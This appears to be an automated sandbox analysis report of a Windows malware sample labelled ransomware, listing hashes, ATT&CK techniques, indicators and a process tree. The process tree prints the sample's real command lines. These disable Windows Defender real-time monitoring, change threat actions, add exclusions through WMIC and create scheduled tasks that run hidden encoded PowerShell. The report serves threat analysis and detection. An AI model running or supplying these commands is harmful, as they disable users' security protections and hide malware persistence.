c1ae3f49094b9542b0ebdccba02fd1dabc49750ffe4ddbe38661ef3949181880

Analysis

max time kernel
99s
max time network
99s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
24-05-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Size

6.6MB
MD5

11070066a80109c22a00ac720006bbaa
SHA1

40158a0a3eb6005cc573903048200a0e436be246
SHA256

c1ae3f49094b9542b0ebdccba02fd1dabc49750ffe4ddbe38661ef3949181880
SHA512

3830aff85e7743650a2834dce51965dd1c8e27655664d2a637e6608c7c03f07d186d4af24db37e83dae03c3c3b9a6af2813372e23af0f3dab276a147f516f1e0
SSDEEP

98304:asuaZIj7qC0HX1apUVCvCrgtepFLUiXC2zirJYYdD9acfC7m+uAWUrBscFFK7IjV:lNZIOXAUCo9wJ2mruEscqrWUrc76P

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ujRQKhsomqXgC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\jbMfBZnRCYwXWnVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\OrbPdMUPlnYWuuDN = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PHshpGZGOCOU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PKitbTPXU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gIbkOBIdgRUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\OrbPdMUPlnYWuuDN = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LmPBUjorYOxoMDhifcR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE

pid process

2672 powershell.exe
2516 powershell.EXE
2632 powershell.EXE
2180 powershell.exe
1556 powershell.EXE
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\manifest.json	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Drops file in System32 directory 9 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exepowershell.EXEpowershell.exepowershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
File created	C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PHshpGZGOCOU2\tlhwkrLzThjvL.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\OZIlESS.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\gIbkOBIdgRUn\DjxOPzc.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created	C:\Program Files (x86)\ujRQKhsomqXgC\DcrKsOm.dll	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\fErPICTAIBeQfSA.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

236 1976 WerFault.exe 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

description	ioc	process
File created	C:\Windows\Tasks\fErPICTAIBeQfSA.job	schtasks.exe

pid	pid_target	process	target process
236	1976	WerFault.exe	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2432	schtasks.exe
2300	schtasks.exe
1188	schtasks.exe
2184	schtasks.exe
2148	schtasks.exe
2640	schtasks.exe
988	schtasks.exe
2924	schtasks.exe
1728	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

pid	process
2672	powershell.exe
2672	powershell.exe
2672	powershell.exe
2516	powershell.EXE
2516	powershell.EXE
2516	powershell.EXE
2632	powershell.EXE
2632	powershell.EXE
2632	powershell.EXE
2180	powershell.exe
1556	powershell.EXE
1556	powershell.EXE
1556	powershell.EXE
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2516	powershell.EXE
Token: SeDebugPrivilege	2632	powershell.EXE
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	WMIC.exe
Token: SeSecurityPrivilege	1608	WMIC.exe
Token: SeTakeOwnershipPrivilege	1608	WMIC.exe
Token: SeLoadDriverPrivilege	1608	WMIC.exe
Token: SeSystemProfilePrivilege	1608	WMIC.exe
Token: SeSystemtimePrivilege	1608	WMIC.exe
Token: SeProfSingleProcessPrivilege	1608	WMIC.exe
Token: SeIncBasePriorityPrivilege	1608	WMIC.exe
Token: SeCreatePagefilePrivilege	1608	WMIC.exe
Token: SeBackupPrivilege	1608	WMIC.exe
Token: SeRestorePrivilege	1608	WMIC.exe
Token: SeShutdownPrivilege	1608	WMIC.exe
Token: SeDebugPrivilege	1608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1608	WMIC.exe
Token: SeRemoteShutdownPrivilege	1608	WMIC.exe
Token: SeUndockPrivilege	1608	WMIC.exe
Token: SeManageVolumePrivilege	1608	WMIC.exe
Token: 33	1608	WMIC.exe
Token: 34	1608	WMIC.exe
Token: 35	1608	WMIC.exe
Token: SeDebugPrivilege	1556	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 1976 wrote to memory of 2984	1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 1976 wrote to memory of 2984	1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 1976 wrote to memory of 2984	1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 1976 wrote to memory of 2984	1976	2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe	cmd.exe
PID 2984 wrote to memory of 2564	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2564	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2564	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2564	2984	cmd.exe	forfiles.exe
PID 2564 wrote to memory of 3040	2564	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 3040	2564	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 3040	2564	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 3040	2564	forfiles.exe	cmd.exe
PID 3040 wrote to memory of 2596	3040	cmd.exe	reg.exe
PID 3040 wrote to memory of 2596	3040	cmd.exe	reg.exe
PID 3040 wrote to memory of 2596	3040	cmd.exe	reg.exe
PID 3040 wrote to memory of 2596	3040	cmd.exe	reg.exe
PID 2984 wrote to memory of 2604	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2604	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2604	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2604	2984	cmd.exe	forfiles.exe
PID 2604 wrote to memory of 2560	2604	forfiles.exe	cmd.exe
PID 2604 wrote to memory of 2560	2604	forfiles.exe	cmd.exe
PID 2604 wrote to memory of 2560	2604	forfiles.exe	cmd.exe
PID 2604 wrote to memory of 2560	2604	forfiles.exe	cmd.exe
PID 2560 wrote to memory of 2700	2560	cmd.exe	reg.exe
PID 2560 wrote to memory of 2700	2560	cmd.exe	reg.exe
PID 2560 wrote to memory of 2700	2560	cmd.exe	reg.exe
PID 2560 wrote to memory of 2700	2560	cmd.exe	reg.exe
PID 2984 wrote to memory of 2704	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2704	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2704	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2704	2984	cmd.exe	forfiles.exe
PID 2704 wrote to memory of 2716	2704	forfiles.exe	cmd.exe
PID 2704 wrote to memory of 2716	2704	forfiles.exe	cmd.exe
PID 2704 wrote to memory of 2716	2704	forfiles.exe	cmd.exe
PID 2704 wrote to memory of 2716	2704	forfiles.exe	cmd.exe
PID 2716 wrote to memory of 2736	2716	cmd.exe	reg.exe
PID 2716 wrote to memory of 2736	2716	cmd.exe	reg.exe
PID 2716 wrote to memory of 2736	2716	cmd.exe	reg.exe
PID 2716 wrote to memory of 2736	2716	cmd.exe	reg.exe
PID 2984 wrote to memory of 2856	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2856	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2856	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2856	2984	cmd.exe	forfiles.exe
PID 2856 wrote to memory of 2608	2856	forfiles.exe	cmd.exe
PID 2856 wrote to memory of 2608	2856	forfiles.exe	cmd.exe
PID 2856 wrote to memory of 2608	2856	forfiles.exe	cmd.exe
PID 2856 wrote to memory of 2608	2856	forfiles.exe	cmd.exe
PID 2608 wrote to memory of 2844	2608	cmd.exe	reg.exe
PID 2608 wrote to memory of 2844	2608	cmd.exe	reg.exe
PID 2608 wrote to memory of 2844	2608	cmd.exe	reg.exe
PID 2608 wrote to memory of 2844	2608	cmd.exe	reg.exe
PID 2984 wrote to memory of 2688	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2688	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2688	2984	cmd.exe	forfiles.exe
PID 2984 wrote to memory of 2688	2984	cmd.exe	forfiles.exe
PID 2688 wrote to memory of 2724	2688	forfiles.exe	cmd.exe
PID 2688 wrote to memory of 2724	2688	forfiles.exe	cmd.exe
PID 2688 wrote to memory of 2724	2688	forfiles.exe	cmd.exe
PID 2688 wrote to memory of 2724	2688	forfiles.exe	cmd.exe
PID 2724 wrote to memory of 2672	2724	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2672	2724	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2672	2724	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2672	2724	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe"
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
- Suspicious use of WriteProcessMemory
PID:2984

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:3040

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2596

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2560

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2700

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2716

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2736

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2608

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2844

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:2664

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsKvgayyk" /SC once /ST 08:02:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2148

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsKvgayyk"
2⤵
PID:2344

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsKvgayyk"
2⤵
PID:1880

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
2⤵
PID:1088

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2800

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
2⤵
PID:3028

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2808

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdRBvwRVC" /SC once /ST 10:49:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2640

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdRBvwRVC"
2⤵
PID:2240

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdRBvwRVC"
2⤵
PID:2196

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
2⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
3⤵
PID:3012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608

